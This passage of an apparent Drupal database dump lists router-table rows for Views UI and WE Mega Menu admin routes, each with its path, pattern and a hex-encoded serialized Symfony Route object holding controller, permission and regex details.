4223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a343a7b693a303b733a323a226a73223b693a313b733a343a2276696577223b693a323b733a31303a22646973706c61795f6964223b693a333b733a343a2274797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131343a227b5e2f61646d696e2f7374727563747572652f76696577732f283f503c6a733e6e6f6a737c616a6178292f7265617272616e67652f283f503c766965773e5b5e2f5d2b2b292f283f503c646973706c61795f69643e5b5e2f5d2b2b292f283f503c747970653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a363a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a2274797065223b693a343b623a313b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a22646973706c61795f6964223b693a343b623a313b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a2276696577223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7265617272616e6765223b7d693a343b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a393a226e6f6a737c616a6178223b693a333b733a323a226a73223b693a343b623a313b7d693a353b613a323a7b693a303b733a343a2274657874223b693a313b733a32323a222f61646d696e2f7374727563747572652f7669657773223b7d7d733a393a22706174685f76617273223b613a343a7b693a303b733a323a226a73223b693a313b733a343a2276696577223b693a323b733a31303a22646973706c61795f6964223b693a333b733a343a2274797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3233323b733a31343a227061747465726e4f75746c696e65223b733a34303a222f61646d696e2f7374727563747572652f76696577732f252f7265617272616e67652f252f252f25223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('views_ui.form_rearrange_filter', '/admin/structure/views/{js}/rearrange-filter/{view}/{display_id}', '/admin/structure/views/%/rearrange-filter/%/%', 116, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36343a222f61646d696e2f7374727563747572652f76696577732f7b6a737d2f7265617272616e67652d66696c7465722f7b766965777d2f7b646973706c61795f69647d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a35313a225c44727570616c5c76696577735f75695c466f726d5c416a61785c5265617272616e676546696c7465723a3a676574466f726d223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31313a22766965772e757064617465223b733a323a226a73223b733a393a226e6f6a737c616a6178223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a343a2276696577223b613a333a7b733a393a2274656d7073746f7265223b623a313b733a343a2274797065223b733a31313a22656e746974793a76696577223b733a393a22636f6e766572746572223b733a35333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e76696577735f7569223b7d7d733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a323a226a73223b693a313b733a343a2276696577223b693a323b733a31303a22646973706c61795f6964223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130353a227b5e2f61646d696e2f7374727563747572652f76696577732f283f503c6a733e6e6f6a737c616a6178292f7265617272616e67655c2d66696c7465722f283f503c766965773e5b5e2f5d2b2b292f283f503c646973706c61795f69643e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a22646973706c61795f6964223b693a343b623a313b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a2276696577223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31373a222f7265617272616e67652d66696c746572223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a393a226e6f6a737c616a6178223b693a333b733a323a226a73223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32323a222f61646d696e2f7374727563747572652f7669657773223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a323a226a73223b693a313b733a343a2276696577223b693a323b733a31303a22646973706c61795f6964223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3131363b733a31343a227061747465726e4f75746c696e65223b733a34353a222f61646d696e2f7374727563747572652f76696577732f252f7265617272616e67652d66696c7465722f252f25223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('views_ui.form_reorder_displays', '/admin/structure/views/{js}/reorder-displays/{view}/{display_id}', '/admin/structure/views/%/reorder-displays/%/%', 116, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36343a222f61646d696e2f7374727563747572652f76696577732f7b6a737d2f72656f726465722d646973706c6179732f7b766965777d2f7b646973706c61795f69647d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a35313a225c44727570616c5c76696577735f75695c466f726d5c416a61785c52656f72646572446973706c6179733a3a676574466f726d223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31313a22766965772e757064617465223b733a323a226a73223b733a393a226e6f6a737c616a6178223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a343a2276696577223b613a333a7b733a393a2274656d7073746f7265223b623a313b733a343a2274797065223b733a31313a22656e746974793a76696577223b733a393a22636f6e766572746572223b733a35333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e76696577735f7569223b7d7d733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a323a226a73223b693a313b733a343a2276696577223b693a323b733a31303a22646973706c61795f6964223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130353a227b5e2f61646d696e2f7374727563747572652f76696577732f283f503c6a733e6e6f6a737c616a6178292f72656f726465725c2d646973706c6179732f283f503c766965773e5b5e2f5d2b2b292f283f503c646973706c61795f69643e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a22646973706c61795f6964223b693a343b623a313b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a2276696577223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31373a222f72656f726465722d646973706c617973223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a393a226e6f6a737c616a6178223b693a333b733a323a226a73223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32323a222f61646d696e2f7374727563747572652f7669657773223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a323a226a73223b693a313b733a343a2276696577223b693a323b733a31303a22646973706c61795f6964223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3131363b733a31343a227061747465726e4f75746c696e65223b733a34353a222f61646d696e2f7374727563747572652f76696577732f252f72656f726465722d646973706c6179732f252f25223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('views_ui.reports_fields', '/admin/reports/fields/views-fields', '/admin/reports/fields/views-fields', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33343a222f61646d696e2f7265706f7274732f6669656c64732f76696577732d6669656c6473223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a35393a225c44727570616c5c76696577735f75695c436f6e74726f6c6c65725c56696577735549436f6e74726f6c6c65723a3a7265706f72744669656c6473223b733a363a225f7469746c65223b733a31333a225573656420696e207669657773223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31363a2261646d696e6973746572207669657773223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34323a227b5e2f61646d696e2f7265706f7274732f6669656c64732f76696577735c2d6669656c6473247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33343a222f61646d696e2f7265706f7274732f6669656c64732f76696577732d6669656c6473223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33343a222f61646d696e2f7265706f7274732f6669656c64732f76696577732d6669656c6473223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('views_ui.reports_plugins', '/admin/reports/views-plugins', '/admin/reports/views-plugins', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32383a222f61646d696e2f7265706f7274732f76696577732d706c7567696e73223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a36303a225c44727570616c5c76696577735f75695c436f6e74726f6c6c65725c56696577735549436f6e74726f6c6c65723a3a7265706f7274506c7567696e73223b733a363a225f7469746c65223b733a31333a22566965777320706c7567696e73223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31363a2261646d696e6973746572207669657773223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33363a227b5e2f61646d696e2f7265706f7274732f76696577735c2d706c7567696e73247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32383a222f61646d696e2f7265706f7274732f76696577732d706c7567696e73223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32383a222f61646d696e2f7265706f7274732f76696577732d706c7567696e73223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('views_ui.settings_advanced', '/admin/structure/views/settings/advanced', '/admin/structure/views/settings/advanced', 31, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34303a222f61646d696e2f7374727563747572652f76696577732f73657474696e67732f616476616e636564223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a34323a225c44727570616c5c76696577735f75695c466f726d5c416476616e63656453657474696e6773466f726d223b733a363a225f7469746c65223b733a32333a22416476616e6365642056696577732073657474696e6773223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31363a2261646d696e6973746572207669657773223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34373a227b5e2f61646d696e2f7374727563747572652f76696577732f73657474696e67732f616476616e636564247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a34303a222f61646d696e2f7374727563747572652f76696577732f73657474696e67732f616476616e636564223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33313b733a31343a227061747465726e4f75746c696e65223b733a34303a222f61646d696e2f7374727563747572652f76696577732f73657474696e67732f616476616e636564223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('views_ui.settings_basic', '/admin/structure/views/settings', '/admin/structure/views/settings', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33313a222f61646d696e2f7374727563747572652f76696577732f73657474696e6773223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33393a225c44727570616c5c76696577735f75695c466f726d5c426173696353657474696e6773466f726d223b733a363a225f7469746c65223b733a31343a2256696577732073657474696e6773223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31363a2261646d696e6973746572207669657773223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33383a227b5e2f61646d696e2f7374727563747572652f76696577732f73657474696e6773247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f76696577732f73657474696e6773223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33313a222f61646d696e2f7374727563747572652f76696577732f73657474696e6773223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('we_megamenu.admin', '/admin/structure/we-mega-menu', '/admin/structure/we-mega-menu', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32393a222f61646d696e2f7374727563747572652f77652d6d6567612d6d656e75223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a363a225f7469746c65223b733a393a224d656761204d656e75223b733a31313a225f636f6e74726f6c6c6572223b733a37333a225c44727570616c5c77655f6d6567616d656e755c436f6e74726f6c6c65725c57654d6567614d656e7541646d696e436f6e74726f6c6c65723a3a6c69737457654d6567614d656e7573223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32323a2261646d696e69737465722077655f6d6567616d656e75223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33383a227b5e2f61646d696e2f7374727563747572652f77655c2d6d6567615c2d6d656e75247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f77652d6d6567612d6d656e75223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32393a222f61646d696e2f7374727563747572652f77652d6d6567612d6d656e75223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('we_megamenu.admin.configure', '/admin/structure/we-mega-menu/{menu_name}/config', '/admin/structure/we-mega-menu/%/config', 29, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34383a222f61646d696e2f7374727563747572652f77652d6d6567612d6d656e752f7b6d656e755f6e616d657d2f636f6e666967223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31353a225f7469746c655f63616c6c6261636b223b733a37363a225c44727570616c5c77655f6d6567616d656e755c436f6e74726f6c6c65725c57654d6567614d656e7541646d696e436f6e74726f6c6c65723a3a676574436f6e666967506167655469746c65223b733a31313a225f636f6e74726f6c6c6572223b733a37343a225c44727570616c5c77655f6d6567616d656e755c436f6e74726f6c6c65725c57654d6567614d656e7541646d696e436f6e74726f6c6c65723a3a636f6e66696757654d6567614d656e75223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32323a2261646d696e69737465722077655f6d6567616d656e75223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a393a226d656e755f6e616d65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36373a227b5e2f61646d696e2f7374727563747572652f77655c2d6d6567615c2d6d656e752f283f503c6d656e755f6e616d653e5b5e2f5d2b2b292f636f6e666967247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f636f6e666967223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a226d656e755f6e616d65223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f77652d6d6567612d6d656e75223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a393a226d656e755f6e616d65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a32393b733a31343a227061747465726e4f75746c696e65223b733a33383a222f61646d696e2f7374727563747572652f77652d6d6567612d6d656e752f252f636f6e666967223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('we_megamenu.admin.reset', '/admin/structure/we-mega-menu/reset', '/admin/structure/we-mega-menu/reset', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33353a222f61646d696e2f7374727563747572652f77652d6d6567612d6d656e752f7265736574223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a363a225f7469746c65223b733a32383a225361766520436f6e66696775726174696f6e204d656761204d656e75223b733a31313a225f636f6e74726f6c6c6572223b733a37393a225c44727570616c5c77655f6d6567616d656e755c436f6e74726f6c6c65725c57654d6567614d656e7541646d696e436f6e74726f6c6c65723a3a7265736574436f6e66696757654d6567614d656e75223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32323a2261646d696e69737465722077655f6d6567616d656e75223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34343a227b5e2f61646d696e2f7374727563747572652f77655c2d6d6567615c2d6d656e752f7265736574247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33353a222f61646d696e2f7374727563747572652f77652d6d6567612d6d656e752f7265736574223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33353a222f61646d696e2f7374727563747572652f77652d6d6567612d6d656e752f7265736574223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('we_megamenu.admin.save', '/admin/structure/we-mega-menu/save', '/admin/structure/we-mega-menu/save', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33343a222f61646d696e2f7374727563747572652f77652d6d6567612d6d656e752f73617665223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a363a225f7469746c65223b733a32383a225361766520436f6e66696775726174696f6e204d656761204d656e75223b733a31313a225f636f6e74726f6c6c6572223b733a37383a225c44727570616c5c77655f6d6567616d656e755c436f6e74726f6c6c65725c57654d6567614d656e7541646d696e436f6e74726f6c6c65723a3a73617665436f6e66696757654d6567614d656e75223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32323a2261646d696e69737465722077655f6d6567616d656e75223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34333a227b5e2f61646d696e2f7374727563747572652f77655c2d6d6567615c2d6d656e752f73617665247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33343a222f61646d696e2f7374727563747572652f77652d6d6567612d6d656e752f73617665223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33343a222f61646d696e2f7374727563747572652f77652d6d6567612d6d656e752f73617665223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('we_megamenu.admin.style', '/admin/structure/we-mega-menu/style', '/admin/structure/we-mega-menu/style', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33353a222f61646d696e2f7374727563747572652f77652d6d6567612d6d656e752f7374796c65223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a363a225f7469746c65223b733a32363a225374796c65204f66204261636b656e64204d656761204d656e75223b733a31313a225f636f6e74726f6c6c6572223b733a38323a225c44727570616c5c77655f6d6567616d656e755c436f6e74726f6c6c65725c57654d6567614d656e7541646d696e436f6e74726f6c6c65723a3a7374796c654f664261636b656e6457654d6567614d656e75223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32323a2261646d696e69737465722077655f6d6567616d656e75223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34343a227b5e2f61646d696e2f7374727563747572652f77655c2d6d6567615c2d6d656e752f7374796c65247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a30